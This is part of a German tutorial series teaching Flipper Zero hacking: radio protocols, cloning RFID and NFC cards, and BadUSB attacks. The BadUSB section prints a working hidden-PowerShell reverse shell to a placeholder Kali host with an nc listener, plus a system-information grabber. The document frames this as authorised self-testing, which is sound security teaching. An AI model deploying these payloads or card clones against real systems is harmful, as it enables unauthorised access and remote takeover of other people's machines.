The Hacker's Path: 5-teilige Serie
Teil 1: Einfuehrung → Teil 2: Flipper-Meisterschaft → Teil 3: Kali-Grundlagen → Teil 4: Exploitation → Teil 5: Das vollstaendige Audit
In Teil 1 haben Sie erste Erfahrungen gesammelt. Sie haben IR-Fernbedienungen geklont, NFC-Karten gescannt, das Sub-GHz-Spektrum aufleuchten sehen und "Hello World" mit BadUSB getippt. Sie haben gesehen, dass Sicherheit oft eine Illusion ist.
Jetzt gehen wir in die Tiefe. Am Ende dieses Artikels werden Sie jedes wichtige Protokoll verstehen, mit dem Ihr Flipper Zero interagieren kann, nicht nur wie man sie benutzt, sondern warum sie so funktionieren und was das fuer die Sicherheit bedeutet.
Faire Warnung: Sie werden entdecken, dass mehrere Dinge, die Sie fuer sicher hielten... es nicht sind.
Die Flipper-Philosophie
Bevor wir in die Protokolle eintauchen, legen wir die richtige Denkweise fest. Der Flipper Zero ist kein "Hacking-Geraet" im Hollywood-Sinne. Er ist ein Lernwerkzeug, das Ihnen erlaubt, mit Funkfrequenzen und Hardware-Protokollen zu interagieren, die normalerweise unsichtbar sind.
Stellen Sie sich ihn wie eine Lupe fuer drahtlose Signale vor. Die Signale waren immer da. Sie konnten sie nur nicht sehen. Jetzt koennen Sie es.
Diese Unterscheidung ist wichtig, weil sie aendert, wie Sie Sicherheit angehen. Die meiste "Sicherheit" beruht auf Verschleierung, der Annahme, dass Angreifer nicht wissen werden, wie sie mit einem System interagieren. Ihr Flipper beseitigt diese Verschleierung. Er zeigt Ihnen genau, was gesendet und empfangen wird. Und sobald Sie es sehen koennen, koennen Sie bewerten, ob tatsaechliche Sicherheit existiert.
Spoiler: Oft existiert sie nicht.
⚠️ Erinnerung: Nur Ihre eigenen Sachen
Alles in diesem Artikel dient zum Testen IHRER EIGENEN Geraete, Karten und Systeme. Die Techniken funktionieren bei den Sachen jedes anderen, das ist der Punkt. Aber sie auf Systemen zu verwenden, die Sie nicht besitzen, ist illegal. Testen Sie Ihre eigene Sicherheit. Entdecken Sie Ihre eigenen Schwachstellen. Das ist der Weg.
Sub-GHz: Das unsichtbare Spektrum
Sub-Gigahertz-Funkfrequenzen sind ueberall. Ihr Garagentor, Autoschluessel, Wetterstation, kabellose Tuerklingel, Reifendrucksensoren, Smart-Home-Geraete, sie alle senden staendig in Frequenzbaendern unter 1 GHz.
Warum Sub-GHz? Niedrigere Frequenzen reisen weiter und durchdringen Waende besser als hoehere Frequenzen wie WiFi (2.4/5 GHz). Das macht sie perfekt fuer Geraete, die zuverlaessige Kommunikation ueber Distanz ohne Sichtlinienerfordernisse benoetigen.
Die Frequenzlandschaft
Verschiedene Regionen nutzen unterschiedliche Frequenzen aufgrund von Regulierungen:
- 315 MHz: Nordamerika: aeltere Garagentore, Autoschluessel
- 390 MHz: Nordamerika: Garagentore, einige Automotive
- 433.92 MHz: Weltweit: Wetterstationen, Sensoren, europaeische Geraete, viele IoT-Produkte
- 868 MHz: Europa: Smart Home, LoRa, Versorgungszaehler
- 915 MHz: Amerika: LoRa, Smart Home, Industrie
Mit Momentum-Firmware kann Ihr Flipper auf allen diesen Baendern senden und empfangen, unabhaengig von Ihrem physischen Standort. Die Standard-Firmware beschraenkt Sie auf die legalen Frequenzen Ihrer Region. Das ist wichtig fuers Lernen: Sie koennten Geraete haben, die auf "auslaendischen" Frequenzen arbeiten.
Projekt: Analysieren Sie Ihr Garagentor
Zeit: 15 Minuten
Was Sie lernen: Der Unterschied zwischen statischen Codes und Rolling Codes, und warum es wichtig ist
Schritte:
- Navigieren Sie zu Sub-GHz → Read
- Stellen Sie sich in die Naehe Ihrer Garage (nicht so nah, dass sich das Tor oeffnet)
- Druecken Sie den Knopf Ihrer Garagentor-Fernbedienung
- Beobachten Sie, wie der Flipper das Signal erfasst
- Untersuchen Sie, was erfasst wurde, sehen Sie sich das identifizierte Protokoll an
Was Sie sehen koennten:
- Princeton, Linear, Chamberlain (alt): Statische Codes. Der gleiche Code wird jedes Mal uebertragen. Anfaellig fuer Replay-Angriffe.
- KeeLoq, Security+ 2.0, Rolling Code: Rolling Codes. Jede Uebertragung verwendet einen anderen Code aus einer synchronisierten Sequenz. Kann nicht einfach wiederholt werden.
Die Realitaet: Wenn Ihr Garagentor einen statischen Code verwendet (viele vor ~2015 installierte tun das), kann jeder, der dieses Signal einmal erfasst, es fuer immer wiederholen. Ihre Garage ist durch die Annahme gesichert, dass niemand zuhoert. Diese Annahme ist gerade zerbrochen.
Rolling Codes erklaert
Moderne Garagentore und Auto-Schluesselanhaenger verwenden Rolling Codes (auch Hopping Codes genannt). So funktionieren sie:
- Sowohl der Sender (Ihre Fernbedienung) als auch der Empfaenger (Ihre Garage) teilen einen geheimen Startwert und Algorithmus
- Jeder Knopfdruck generiert den naechsten Code in einer synchronisierten Sequenz
- Der Empfaenger akzeptiert den aktuellen Code ODER einen der naechsten ~256 Codes (um Knopfdruecke ausserhalb der Reichweite zu beruecksichtigen)
- Sobald ein Code verwendet wurde, wird er fuer immer ungueltig
Das bedeutet, dass das Erfassen und Wiederholen eines Rolling-Code-Signals nicht funktioniert: Bis Sie es wiederholen, ist der Code bereits ungueltig.
Warum das wichtig ist
Rolling Codes wurden erfunden, weil die Sub-GHz-Welt entdeckte, dass Sicherheit durch Verschleierung scheitert. Jemand fand heraus, wie man Signale erfasst und wiedergibt, also musste die Industrie tatsaechliche kryptografische Sicherheit implementieren. Dieses Muster wiederholt sich bei jedem Protokoll, das wir besprechen: Sicherheit wird erst hinzugefuegt, nachdem jemand die Schwachstelle demonstriert hat.
Projekt: Wetterstationsdaten erfassen
Zeit: 10 Minuten
Was Sie lernen: Wie viele Daten ohne jeglichen Schutz gesendet werden
Schritte:
- Navigieren Sie zu Sub-GHz → Read
- Warten Sie in der Naehe eines kabellosen Wettersensors (Aussenthermometer, Regenmesser, etc.)
- Die meisten senden alle 30-60 Sekunden
- Erfassen Sie die Uebertragung
- Notieren Sie das Protokoll und alle dekodierten Daten
Was Sie finden werden: Temperatur, Luftfeuchtigkeit, Batteriestatus, Sensor-ID, alles im Klartext uebertragen. Keine Verschluesselung, keine Authentifizierung. Jeder Empfaenger, der auf diese Frequenz eingestellt ist, erhaelt alle Daten. Denken Sie jetzt darueber nach, was sonst in Ihrer Nachbarschaft sendet...
RFID: Die 125kHz-Welt
Niederfrequenz-RFID (125kHz) ist die aeltere, einfachere Proximity-Card-Technologie. Sie finden sie in Fitnessstudio-Mitgliedskarten, aelteren Buerozugangskarten, Parkgaragen und Apartmentgebaeude-Eingangssystemen.
Und sie ist fast universell schrecklich fuer die Sicherheit.
Wie 125kHz RFID funktioniert
Diese Karten sind passiv, sie haben keine Batterie. Wenn Sie eine in die Naehe eines Lesers halten, versorgt das elektromagnetische Feld des Lesers die Karte mit Strom, und die Karte uebertraegt ihre ID-Nummer. Das ist alles. Keine Challenge-Response. Keine Verschluesselung. Nur: "Ich bin Karte Nummer 12345."
Der Leser sagt "okay" und gewaehrt Zugang allein basierend auf der Kenntnis dieser ID-Nummer.
Sie sehen das Problem.
Gaengige 125kHz-Kartentypen
- EM4100: Extrem verbreitet. Sendet einfach eine 40-Bit-ID. Null Sicherheit.
- HID Prox: Die gaengigste Unternehmenszugangskarte. Sendet Anlagencode + Kartennummer. Null Sicherheit.
- Indala: Weniger verbreitet. Andere Kodierung, aber das gleiche Problem: keine Sicherheit.
- AWID: Eine weitere Variante. Die gleiche grundlegende Schwaeche.
Bemerken Sie das Muster? Alle diese Karten senden einfach eine ID. Die "Sicherheit" besteht darin, dass jemand spezialisierte Ausruestung braeuchte, um diese ID zu lesen. Ihr Flipper ist diese Ausruestung.
Projekt: Klonen Sie Ihre Fitnessstudio-Karte
Zeit: 5 Minuten
Was Sie brauchen: Ihre Fitnessstudio-/Pool-/Apartment-125kHz-Karte, eine leere T5577-Karte (1-2$ pro Stueck)
Schritte:
- Navigieren Sie zu 125 kHz RFID → Read
- Halten Sie Ihre Karte gegen die Rueckseite des Flipper (wo die RFID-Antenne ist)
- Warten Sie auf ein erfolgreiches Lesen, notieren Sie Kartentyp und ID
- Speichern Sie die Karte mit einem erkennbaren Namen
- Zum Testen der Emulation: Saved → Select Card → Emulate
- Halten Sie den Flipper an den Leser Ihres Fitnessstudios, es sollte identisch zu Ihrer Karte funktionieren
Auf eine leere T5577 schreiben:
- Gehen Sie zu Ihrer gespeicherten Karte
- Waehlen Sie Write
- Halten Sie eine leere T5577-Karte an den Flipper
- Warten Sie auf die Schreibbestaetigung
- Sie haben jetzt einen physischen Klon
Warum das wichtig ist: Das gesamte Sicherheitsmodell dieses Zutrittskontrollsystems ist gerade zusammengebrochen. Jeder, der fuer zwei Sekunden in die Naehe Ihrer Karte kommen kann, kann sie klonen. Denken Sie darueber nach, wenn Sie das naechste Mal Ihre Sporttasche unbeaufsichtigt im Umkleideraum lassen.
Die T5577: Ihre Zauberkarte
Die T5577 ist eine wiederbeschreibbare RFID-Karte, die die meisten 125kHz-Kartentypen emulieren kann. Sie ist wie ein leerer CD-R fuer Zugangskarten. Sie koennen beliebige Kartendaten darauf schreiben, und sie wird zu dieser Karte.
Kaufen Sie ein 10er-Pack zum Testen. Sie sind guenstig und unglaublich nuetzlich, um zu verstehen, wie schwach diese gesamte Technologie ist.
Was das offenbart
125kHz-RFID-"Sicherheit" ist reines Theater. Diese Systeme nehmen an, dass Sie die Karte nicht lesen, die Daten nicht kopieren und sie nicht auf eine andere Karte schreiben koennen. Alle drei Annahmen sind mit Verbraucherausruestung falsch. Wenn Ihr Arbeitsplatz HID-Prox-Karten verwendet (die gaengigste Unternehmenszugangskarte), kann jeder Mitarbeiter mit einem Flipper den Zugang jedes anderen Mitarbeiters klonen. Lassen Sie das sacken.
Wichtiger Punkt
125kHz-RFID-Sicherheit ist reines Theater. Diese Systeme nehmen an, dass Sie Kartendaten nicht lesen, kopieren oder ueberschreiben koennen. Alle drei Annahmen sind mit Verbraucherausruestung unter 200$ falsch.
NFC: Die 13.56MHz-Welt
Hochfrequenz-NFC (13.56 MHz) ist die neuere Generation. Es treibt kontaktloses Bezahlen, moderne Zugangskarten, Transitsysteme, Hotelschluessel und das Tap-to-Pay Ihres Telefons an.
Die gute Nachricht: Einige NFC-Karten haben tatsaechlich echte Sicherheit.
Die schlechte Nachricht: Viele nicht.
NFC-Kartentypen
- MIFARE Classic: Extrem verbreitet in Zugangskarten, Transit, Hotels. Verwendet proprietaere Verschluesselung, die vor Jahren geknackt wurde. Verwundbar.
- MIFARE Ultralight: Einfache Karten mit minimaler Sicherheit. Oft fuer Einweg-Fahrkarten verwendet.
- NTAG: Verbreitet in NFC-Tags fuer Automatisierung. Meist minimale Sicherheit.
- MIFARE DESFire: Tatsaechlich sicher. Verwendet AES-Verschluesselung. In neueren Hochsicherheits-Implementierungen verwendet.
- EMV (Zahlungskarten): Ihre Kreditkarte. Hat starke Verschluesselung, Transaktionslimits und Betrugserkennung.
Projekt: Analysieren Sie Ihren Arbeitsausweis
Zeit: 10 Minuten
Was Sie lernen: Ob Ihr Arbeitsplatz echte Sicherheit oder Sicherheitstheater hat
Schritte:
- Navigieren Sie zu NFC → Read
- Halten Sie Ihren Arbeitsausweis gegen die Rueckseite des Flipper
- Warten Sie, bis das Lesen abgeschlossen ist
- Untersuchen Sie, was der Flipper Ihnen sagt
Ergebnisse interpretieren:
- MIFARE Classic 1K/4K: Ihr Ausweis verwendet geknackte Verschluesselung. Mit Zeit und den richtigen Werkzeugen kann er geklont werden.
- MIFARE Ultralight: Minimale Sicherheit. Oft klonbar.
- MIFARE DESFire: Tatsaechlich sicher. Sie werden begrenzte Daten sehen.
- Unknown/Locked: Koennte proprietaer oder DESFire sein. Weitere Untersuchung noetig.
Realitaetscheck: Die meisten Unternehmensausweise sind immer noch MIFARE Classic. Die Verschluesselung wurde 2008 oeffentlich gebrochen. Vor achtzehn Jahren. Wenn Ihr Ausweis MIFARE Classic anzeigt, betreibt Ihr Arbeitgeber ein Sicherheitssystem, das Kryptografen als lachhaft unsicher betrachten.
UID-Klonen vs vollstaendiges Klonen
Wichtige Unterscheidung: Der Flipper kann immer die UID (Unique Identifier) einer Karte lesen und emulieren, die Seriennummer. Manche Zugangssysteme pruefen nur die UID. Fuer diese Systeme funktioniert einfache Emulation.
Bessere Systeme pruefen sowohl die UID ALS AUCH die verschluesselten Daten auf der Karte. Dafuer muessten Sie auch die verschluesselten Sektoren klonen, moeglich fuer MIFARE Classic (die Verschluesselung ist gebrochen), aber nicht fuer DESFire.
Projekt: Hotelschluesselkarten-Analyse
Zeit: 5 Minuten (naechstes Mal im Hotel)
Was Sie lernen: Wie Hotelsicherheit wirklich funktioniert
Schritte:
- Lesen Sie Ihre Hotelschluesselkarte mit NFC → Read
- Notieren Sie den Kartentyp
- Sehen Sie, welche Daten lesbar sind
Was Sie typischerweise finden: Die meisten Hotelschluessel sind MIFARE Ultralight oder Classic. Manche zeigen Zimmernummer, Checkout-Datum oder andere Metadaten in lesbaren Sektoren. Die "Sicherheit" besteht darin, dass Gaeste normalerweise keine NFC-Leser haben. Sie haben jetzt einen.
Magic Cards fuer NFC
Wie die T5577 fuer 125kHz gibt es "magische" NFC-Karten fuer 13.56MHz:
- Gen1 (UID aenderbar): Kann benutzerdefinierte UID schreiben. Von manchen Lesern als "magisch" erkannt.
- Gen2 (CUID): Bessere Kompatibilitaet. UID-Aenderungen bleiben ueber Stromzyklen bestehen.
- Gen3 (UFUID): Kann UID nach dem Schreiben sperren, erscheint als normale Karte.
- Gen4 (Ultimate Magic): Am flexibelsten. Kann mehrere Kartentypen emulieren.
Zum Lernen sind Gen2-Karten der Sweet Spot: guenstig, weitgehend kompatibel und gut genug fuer die meisten Tests.
Infrarot: Vollstaendige Kontrolle
Sie haben bereits IR-Fernbedienungen in Teil 1 erstellt. Gehen wir tiefer.
Die ultimative Fernbedienungsbibliothek aufbauen
Der Flipper kann unbegrenzt IR-Fernbedienungen speichern. Aber jeden Knopf einzeln zu lernen ist muehsam. Besserer Ansatz: nutzen Sie die Community-Datenbanken.
Momentum-Firmware enthaelt IRDB, eine riesige Datenbank vorerfasster Fernbedienungen. Sie koennen auch Fernbedienungen von GitHub-Repositories herunterladen und zur SD-Karte Ihres Flipper hinzufuegen.
Projekt: Bauen Sie Ihr IR-Arsenal auf
Zeit: 20 Minuten
Schritte:
- Auf Ihrem Flipper: Infrared → Universal Remotes
- Sie finden vorgefertigte Universalfernbedienungen fuer TVs, Klimaanlagen, Projektoren, etc.
- Testen Sie diese an Ihren Geraeten
- Fuer nicht abgedeckte Geraete verwenden Sie Learn New Remote
- Organisieren Sie gespeicherte Fernbedienungen nach Raum oder Geraetetyp
Power Move: Erstellen Sie "Raum-Fernbedienungen", die alle IR-Geraete in einem Raum kombinieren. Eine Datei steuert TV, Soundbar, Lichter und Klimaanlage.
Was Sie lernen: IR ist universell und ungeschuetzt. Jedes Geraet mit einem IR-Empfaenger kann von jedem Geraet mit einem IR-Sender gesteuert werden. Das ist beabsichtigt: IR wurde fuer Komfort entworfen, nicht fuer Sicherheit. Ihr Flipper macht diesen Komfort einfach universell.
Rohe IR-Erfassung
Manche Geraete verwenden nicht-standardmaessige IR-Protokolle. Fuer diese kann der Flipper das Rohsignal erfassen, das exakte Timing von An/Aus-Pulsen, und es perfekt wiedergeben.
Navigieren Sie zu Infrared → Learn New → Raw, wenn die Standard-Erkennung ein Signal nicht erkennt.
BadUSB: Die Rubber-Ducky-Alternative
In Teil 1 haben Sie den Flipper "Hello World" tippen lassen. Jetzt wird es ernst.
BadUSB (auch bekannt als USB-Rubber-Ducky-Angriffe) nutzt eine fundamentale Schwaeche in der Art, wie Computer USB-Geraete handhaben: Sie vertrauen Tastaturen implizit. Wenn Sie ein Geraet anschliessen, das behauptet, eine Tastatur zu sein, akzeptiert der Computer jeden Tastenanschlag ohne Frage.
Ihr Flipper kann ungefaehr 1.000 Zeichen pro Sekunde tippen. Schneller als jeder Mensch. Schnell genug, um komplexe Angriffe auszufuehren, bevor jemand reagieren kann.
DuckyScript-Grundlagen
BadUSB-Payloads verwenden DuckyScript, eine einfache Skriptsprache. Wichtige Befehle:
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPEProjekt: Systeminformations-Sammler
Zeit: 15 Minuten
Was es tut: Oeffnet PowerShell, sammelt Systeminformationen, speichert in einer Datei (auf IHREM Rechner)
REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTERWas Sie lernen: In weniger als 3 Sekunden physischem Zugang koennte ein Angreifer Hostname, Benutzername, Domaene, IP-Adressen und OS-Version sammeln. Das ist Aufklaerung. Stellen Sie sich vor, was sonst in diesen 3 Sekunden getippt werden koennte.
Projekt: Reverse-Shell-Setup
Zeit: 30 Minuten (inklusive Kali-Setup)
Was es tut: Erstellt eine Verbindung zurueck zu Ihrem Kali-Rechner (Vorbereitung fuer Teil 3)
Voraussetzungen: Kali Linux laeuft (VM ist in Ordnung), kennen Sie die IP Ihres Kali
Auf Kali - Listener starten:
nc -lvnp 4444
BadUSB-Payload (Windows-Ziel):
REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTERWas passiert: Der Zielrechner oeffnet eine PowerShell-Verbindung zurueck zu Ihrem Kali-Rechner. Sie haben jetzt Kommandozeilen-Zugang zu diesem Rechner. Dies ist der Kern, wie physischer Zugang + BadUSB = vollstaendige Kompromittierung. Wir werden dies in Teil 3 weiter erforschen.
⚠️ Diese Payloads sind echt
Der Reverse-Shell-Payload oben funktioniert tatsaechlich. Verwenden Sie ihn NUR auf Rechnern, die Sie besitzen, zum Testen. Diesen auf dem Rechner eines anderen auszufuehren ist ein Bundesverbrechen (unberechtigter Zugang + Installation einer Hintertuer). Der Sinn ist, die Bedrohung zu verstehen, nicht eine zu erschaffen.
Spassige Payloads fuer Demonstrationen
Um BadUSB anderen zu demonstrieren (auf deren Rechner mit Erlaubnis), hier einige harmlose aber eindrucksvolle Payloads:
REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTERREM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROWGPIO: Hardware-Erweiterung
Die GPIO-Pins (General Purpose Input/Output) des Flipper erlauben Ihnen, externe Module anzuschliessen und Faehigkeiten zu erweitern. Hier verwandelt sich der Flipper von einem Handgeraet in eine Entwicklungsplattform.
Unverzichtbare Module
- WiFi Dev Board: Fuegt WiFi-Faehigkeiten hinzu: Paketerfassung, Deauth-Tests, Evil-Twin-Angriffe. Essentiell ab Teil 3.
- CC1101 Externe Antenne: Erweitert die Sub-GHz-Reichweite dramatisch. Die interne Antenne funktioniert, aber extern ist besser fuer ernsthafte Arbeit.
- ESP32 Marauder: Verwandelt den Flipper in eine WiFi/Bluetooth-Hacking-Plattform. Erfasst Handshakes, fuehrt Angriffe aus.
- ProtoBoard: Fuer benutzerdefinierte Projekte und den Anschluss eigener Hardware.
Projekt: WiFi Dev Board Setup
Zeit: 20 Minuten
Was Sie brauchen: WiFi Dev Board (offizieller oder kompatibler ESP32)
Schritte:
- Flashen Sie Marauder-Firmware auf den ESP32 (Anleitung auf github.com/justcallmekoko/ESP32Marauder)
- Verbinden Sie mit den GPIO-Pins des Flipper
- Navigieren Sie zu GPIO → ESP32 → Marauder
- Sie haben jetzt WiFi-Scanning, Deauth und Paketerfassung
Warum das wichtig ist: Der Flipper allein kann kein WiFi, ihm fehlt die richtige Funkhardware. Aber mit dem Dev Board koennen Sie Netzwerke scannen, WPA-Handshakes erfassen und WiFi-Angriffe durchfuehren. Wir werden dies ausfuehrlich in den Teilen 3 und 4 nutzen.
Erweiterte Momentum-Funktionen
Wenn Sie Momentum-Firmware ausfuehren (sollten Sie), hier sind Funktionen, die es wert sind, erkundet zu werden:
- Desktop-Animationen: Rein kosmetisch, aber spassig. Schauen Sie sich Community-Animationspakete an.
- Erweiterte Protokolle: Momentum fuegt Unterstuetzung fuer Protokolle hinzu, die die Standard-Firmware nicht enthaelt.
- Anwendungs-Hub: Zusaetzliche Apps ueber den Standard hinaus: Spiele, Werkzeuge, spezialisierte Dienstprogramme.
- Benutzerdefinierte Asset-Packs: Aendern Sie das gesamte Erscheinungsbild.
Der echte Wert liegt in den freigeschalteten Frequenzen und der erweiterten Protokollunterstuetzung. Die Standard-Firmware ist absichtlich fuer die gesetzliche/regulatorische Konformitaet eingeschraenkt. Momentum geht davon aus, dass Sie ein Erwachsener sind, der die Regeln versteht.
Was Sie gemeistert haben
Sie verstehen jetzt:
- Sub-GHz: Wie Garagentore, Autoschluessel und Sensoren kommunizieren, und warum Rolling Codes wichtig sind
- 125kHz RFID: Warum Fitnessstudio-Karten und alte Zugangskarten trivial klonbar sind
- 13.56MHz NFC: Der Unterschied zwischen gebrochener Verschluesselung (MIFARE Classic) und echter Sicherheit (DESFire)
- Infrarot: Wie man eine universelle Fernbedienungsbibliothek aufbaut und Rohsignale erfasst
- BadUSB: Warum USB-HID-Vertrauen eine fundamentale Schwachstelle ist, und wie man sie ausnutzt
- GPIO: Wie man zu WiFi, erweiterter Reichweite und benutzerdefinierter Hardware expandiert
Ihr Flipper ist jetzt eine Waffe. Aber er ist ein Schraubenzieher im Vergleich zu Kali Linux, das eine ganze Werkstatt ist. Zeit, die echte Hacking-Umgebung zu starten.
The Hacker's Path
Eine 5-teilige Serie, die Sie von neugierig zu faehig bringt.
Teil 1: Einfuehrung Teil 2: Flipper-Meisterschaft ✓ Teil 3: Kali-Grundlagen Teil 4: Exploitation Teil 5: Vollstaendiges Audit
Teil 2 Checkliste
☐ Sub-GHz: Garagentor analysiert, Rolling vs statische Codes verstanden
☐ 125kHz RFID: Karten gelesen, mindestens ein Klon getestet
☐ NFC: Arbeitsausweis analysiert, Kartentyp identifiziert
☐ Infrarot: Komplette Heim-Fernbedienungsbibliothek aufgebaut
☐ BadUSB: Systeminfo-Payload getestet, Reverse Shell verstanden
☐ GPIO: WiFi Dev Board bereit fuer Teil 3
☐ Magic Cards: T5577 und/oder NFC Magic Cards fuer Tests beschafft
Was kommt als naechstes
In Teil 3 verlassen wir die fokussierten Faehigkeiten des Flipper und betreten die vollstaendige Penetrationstest-Umgebung: Kali Linux.
Sie lernen:
- Einrichtung Ihres Hacking-Labors (VM-Installation und Konfiguration)
- Netzwerkaufklaerung mit nmap: jeden Geraet in Ihrem Netzwerk kartieren
- Drahtlose Aufklaerung: WiFi-Handshakes mit aircrack-ng erfassen
- Web-Aufklaerung: entdecken, was Ihr Router preisgibt
- Flipper-Erfassungen mit Kali-Workflows verbinden
Der Flipper hat Ihnen gezeigt, dass Schwachstellen existieren. Kali hilft Ihnen zu verstehen, wie tief sie genau gehen.
Bis Teil 3.